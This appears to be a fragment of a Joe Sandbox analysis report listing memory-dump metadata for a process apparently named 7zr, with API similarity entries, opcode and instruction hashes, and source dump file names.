                                    • Instruction Fuzzy Hash: D5A0027C780B40B7ED60A7716D4FF5937347781F15F7085457241690D05EE470559A5C
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                     • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                    • Instruction ID: eb40a6c349ce866c388dd55829fae7016b75e61b0abf306a9937754d8fef2156
                                    • Opcode Fuzzy Hash: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                    • Instruction Fuzzy Hash:
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                     • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                    • Instruction ID: 7d1306b5a60df5bae4ea2a5b78d447834102bea88b918e806d7abcfe09572457
                                    • Opcode Fuzzy Hash: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                    • Instruction Fuzzy Hash: